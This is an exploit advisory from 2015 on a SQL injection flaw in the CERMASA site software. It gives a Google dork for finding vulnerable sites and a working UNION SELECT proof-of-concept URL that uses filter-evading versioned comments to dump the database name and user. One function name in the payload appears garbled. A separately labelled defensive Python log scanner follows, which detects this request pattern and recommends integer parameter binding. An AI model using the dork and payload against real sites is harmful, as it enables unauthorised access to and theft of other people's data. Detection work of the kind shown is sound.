
CERMASA SQL Injection Vulnerability

Author: Anas H4X0R, Published: 29-06-2015
[+] Title  => CERMASA SQL Injection Vulnerability



[+] Date => 29 June 2015



[+] Author & Discovered => Anas H4X0R

Facebook => http://www.fb.com/anas.pico

eMail => haxor137@gmail.com


[+] Tested on : BackBox 3.14


[+] Software Homepage => http://www.cermasa.es



[+] Google Dorks =>

Dork1: intext:alojado por CERMASA+inurl:index.php?id=

########################################################

Exploit : http://www.exemple.com/index.php?id=[sql]

POC :
http://www.exemple.com/index.php?id=-4%20/*!50000union*/+/*!50000select*/%201,CONCAT_WoldS(database(),CHAR(60,%20102,%20111,%20110,%20116,%2032,%2099,%20111,%20108,%20111,%20114,%2061,%2039,%20114,%20101,%20100,%2039,%2062,%2068,%2097,%20116,%2097,%2098,%20115,%20101,%2032,%2061,%2032,%2032,%2060,%2047,%20102,%20111,%20110,%20116,%2062),CHAR(60,%2098,%20114,%2062,%2060,%20102,%20111,%20110,%20116,%2032,%2099,%20111,%20108,%20111,%20114,%2061,%2039,%20114,%20101,%20100,%2039,%2062,%20117,%20115,%20101,%20114,%2032,%2058,%2032,%2060,%2047,%20102,%20111,%20110,%20116,%2062),user()),3,4--
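
A defender-side check for the request shape in the POC above, added here as an example and not part of the original advisory: it decodes the `id` parameter from access-log lines, unwraps MySQL versioned comments such as `/*!50000union*/`, and flags values that are non-numeric or carry UNION SELECT. The log lines, the combined-log format and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# MySQL executes the body of /*!NNNNN ... */ "versioned" comments, so a filter
# that discards them as ordinary comments never sees the keywords inside.
VERSIONED = re.compile(r"/\*!\d*(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+|distinct\s+)?select\b", re.I)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines; line 2 carries a shortened form of the POC request.
SAMPLE_LOG = [
    '203.0.113.5 - - [29/Jun/2015:10:00:01 +0000] "GET /index.php?id=4 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [29/Jun/2015:10:00:07 +0000] "GET /index.php?id=-4%20/*!50000union*/+/*!50000select*/%201,2,3,4-- HTTP/1.1" 200 5342',
    '203.0.113.7 - - [29/Jun/2015:10:00:09 +0000] "GET /index.php?id=12abc HTTP/1.1" 200 5120',
]


def normalize(value):
    """Unwrap versioned comments, drop plain ones, collapse whitespace."""
    value = VERSIONED.sub(r" \1 ", value)
    value = PLAIN_COMMENT.sub(" ", value)
    return re.sub(r"\s+", " ", value).strip()


def check_id(value):
    """Return the reasons an `id` value looks like an injection attempt."""
    reasons = []
    if not re.fullmatch(r"[0-9]+", value):
        reasons.append("non-numeric id")
    if VERSIONED.search(value):
        reasons.append("versioned comment")
    if UNION_SELECT.search(normalize(value)):
        reasons.append("union select")
    return reasons


def scan(lines):
    """Return (line_number, reasons) for requests with a suspicious id."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        # parse_qs percent-decodes and maps '+' to space, like PHP's $_GET.
        for value in parse_qs(urlsplit(m.group(1)).query).get("id", []):
            reasons = check_id(value)
            if reasons:
                hits.append((n, reasons))
    return hits
```

The same numeric-only test belongs in the application itself: binding `id` as an integer parameter in the query removes the injection point that this log check only observes.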

Greetz to : Electronic Atlas Lions Family < Maro Nox - Zoldik Kilwa - Mr.Nemo - Ayoub Frifra - Moroccan Red Light > <3 <3

also : Moroccan Wolf - Abdellah El maghribi - SQL3r - Manual Ayoub & all my friends <3 <3

Ramadan Mobarak

